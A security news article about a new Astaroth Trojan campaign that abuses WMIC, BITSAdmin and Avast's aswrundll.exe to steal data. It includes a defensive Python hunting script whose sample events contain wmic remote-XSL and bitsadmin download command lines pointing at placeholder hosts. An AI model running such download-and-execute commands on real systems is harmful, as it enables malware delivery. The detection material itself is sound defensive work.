Astaroth Trojan Exploits Anti-Malware Software to Steal Data

Recently, a team of security analysts detected a new Astaroth Trojan campaign that exploits security software and Avast antivirus to load malicious modules on affected machines and steal users' personal data. Astaroth Trojan is not new malware. Its attacks were first identified in 2017, but the new strain has been detected spreading in South America, specifically Brazil, and in Europe.

Astaroth Trojan: Mainly Uses Built-In Windows Processes

According to Cybereason's Nocturnus team, Astaroth Trojan uses legitimate built-in Windows processes to perform malicious actions on the compromised machine and deliver its payload. It also makes use of well-known security and anti-malware tools to expand its malicious capabilities. Previously, Cofense identified Astaroth Trojan as part of malware campaigns mainly known for abusing LOLBins, such as the WMIC command-line interface, to download and install malicious payloads in the background.

Get Familiar With The Detailed Information of Astaroth Trojan

Astaroth is another name for the "Great Duke of Hell". It is dangerous malware that aims to steal users' personal and sensitive data by reading data copied to the clipboard, logging keystrokes, and delivering other malware. In-depth analysis revealed that it uses the "fromCharCode()" deobfuscation method, which helps the malware avoid detection during initiation. To interact with command-and-control servers, it relies on abused tools and binary modules. Because of its information-gathering behavior, users should follow Astaroth Trojan removal guidelines immediately to get rid of it.

Infection Method of Astaroth Trojan

The new strain of Astaroth Trojan often uses the Windows BITSAdmin utility to download its payload. It is often distributed through spam emails, and the infection starts with a .7zip archive. The malicious archive includes a .lnk file that spawns the wmic.exe process and initiates an XSL Script Processing attack. Once Astaroth Trojan downloads the locked XSL script, it uses BITSAdmin to grab the payload from another command-and-control server. Some system files or images without any extension also contain Astaroth Trojan modules.
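The chain described above (wmic.exe loading an XSL script, then BITSAdmin fetching the payload) can be hunted for in process-creation logs. The following Python detection logic is an added example, not code from the original article or from the researchers it cites; the events, host names and example.invalid URLs are constructed, and the rule names and five-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (host, time, image, command line); not real telemetry.
EVENTS = [
    ("WS01", "2019-02-13T09:00:01", "wmic.exe",
     'wmic os get /format:"https://example.invalid/a.xsl"'),
    ("WS01", "2019-02-13T09:00:09", "bitsadmin.exe",
     r"bitsadmin /transfer job1 /priority foreground https://example.invalid/p.jpg C:\Users\Public\p.jpg"),
    ("WS02", "2019-02-13T09:05:00", "wmic.exe", "wmic os get caption /format:list"),
    ("WS03", "2019-02-13T09:10:00", "bitsadmin.exe", "bitsadmin /list /allusers"),
]

FORMAT_ARG = re.compile(r'/format:\s*"?([^"\s]+)', re.I)
BITS_FETCH = re.compile(r'/(transfer|addfile)\b.*https?://', re.I)

def classify(image, cmdline):
    """Return a rule name (assumed labels) for a suspicious LOLBin call, else None."""
    image = image.lower()
    if image == "wmic.exe":
        m = FORMAT_ARG.search(cmdline)
        # Built-in formats (list, csv, table) are benign; a URL or .xsl stylesheet is not.
        if m and (m.group(1).lower().startswith(("http://", "https://"))
                  or m.group(1).lower().endswith(".xsl")):
            return "WMIC_XSL"
    elif image == "bitsadmin.exe" and BITS_FETCH.search(cmdline):
        return "BITS_DOWNLOAD"
    return None

def find_chains(events, window=timedelta(minutes=5)):
    """Hosts where a WMIC XSL load is followed by a BITS download within the window."""
    last_wmic, hits = {}, []
    for host, ts, image, cmdline in sorted(events, key=lambda e: e[1]):
        when, rule = datetime.fromisoformat(ts), classify(image, cmdline)
        if rule == "WMIC_XSL":
            last_wmic[host] = when
        elif rule == "BITS_DOWNLOAD" and host in last_wmic and when - last_wmic[host] <= window:
            hits.append(host)
    return hits

if __name__ == "__main__":
    for host in find_chains(EVENTS):
        print(f"{host}: wmic XSL load followed by bitsadmin download")
```

Correlating the two events per host keeps routine administrative use of either tool, such as WS02 and WS03 in the sample data, from raising an alert on its own.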

Malevolent Actions of Astaroth Trojan

Astaroth Trojan is dangerous malware that can exploit computer vulnerabilities and put privacy at high risk. It is known for injecting its malicious payload into aswrundll.exe, the Avast software runtime dynamic link library of Avast anti-malware. As the paragraphs above make clear, attackers specifically designed Astaroth Trojan to load extra modules and gather crucial data. It is also designed to exploit the Unins000.exe process of the security software developed by GAS Tecnologia. Like other malware, Astaroth Trojan has many negative traits, so users should choose an effective solution to delete it and deal with the issues it causes.
